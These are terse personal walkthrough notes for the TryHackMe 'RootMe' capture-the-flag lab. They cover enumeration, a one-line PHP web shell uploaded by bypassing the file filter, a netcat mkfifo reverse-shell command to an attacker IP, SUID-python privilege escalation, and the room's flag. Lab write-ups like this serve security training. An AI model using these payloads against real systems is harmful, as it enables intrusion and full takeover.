ROOTME 

export ip='10.10.151.108'


RECONAISSANCE
nmap -sCV 10.10.151.108 > nmapscan.txt
 			>>> nmapscan.txt 
 			
Hidden directories
	dirsearch 
		dirsearch -u http://10.10.151.108/ 
			[04:44:45] 301 -  312B  - /css  ->  http://10.10.151.108/css/               
			[04:45:05] 200 -  616B  - /index.php                                        
			[04:45:06] 200 -  616B  - /index.php/login/                                 
			[04:45:09] 200 -  959B  - /js/                                              
			[04:45:27] 301 -  314B  - /panel  ->  http://10.10.151.108/panel/           
			[04:45:27] 200 -  732B  - /panel/                                           
			[04:45:45] 403 -  278B  - /server-status                                    
			[04:45:45] 403 -  278B  - /server-status/                                   
			[04:46:02] 200 -  744B  - /uploads/                                         
			[04:46:02] 301 -  316B  - /uploads  ->  http://10.10.151.108/uploads/       
	gobuster
		gobuster dir -u http://10.10.151.108/ -w /usr/share/wordlist/dirbuster/directorylist-2.3-medium.txt
		
GETTING A SHELL 

bypassing file upload and reverse shell

using php reverse shell
	
	create a file webshell.php5
		<?php system($_GET['cmd']);?>
	/uploads
		http://10.10.151.108/uploads/webshell.php5?cmd=less%20../../user.txt
			rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.81.162 4444 >/tmp/f
		
OR	
	source file upload : https://gobiasinfosec.blog/2019/12/24/file-upload-attacks-php-reverse-shell/<img src="webshell.php.gif" alt="" /
		wont use this anymore 

	sudo cp /usr/share/webshells/php/php-reverse-shell.php .
	mv php-reverse-shell.php rshell.pHP or php5/phtml
		cat rshell.php
			change ip and port number 
			setup netcat listener
			then run the file on the server 
				rshell:
					find / -name user.txt
					cat /var/www/user.txt

privilege escalation

	new ip: ----
	find / -user root -perm /4000
	2>/dev/null (to filter out error)
		/usr/bin/python
	gtfobins site (https://gtfobins.github.io/gtfobins/python)
	search python
	/usr/bin/./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
	BOOOOM!! 
	ROOT!!
	find root.txt
	cd root
	ls
	cat root.txt
	THM{pr1v1l3g3_3sc4l4t10n}
	
	
	
	THE END
			
			








	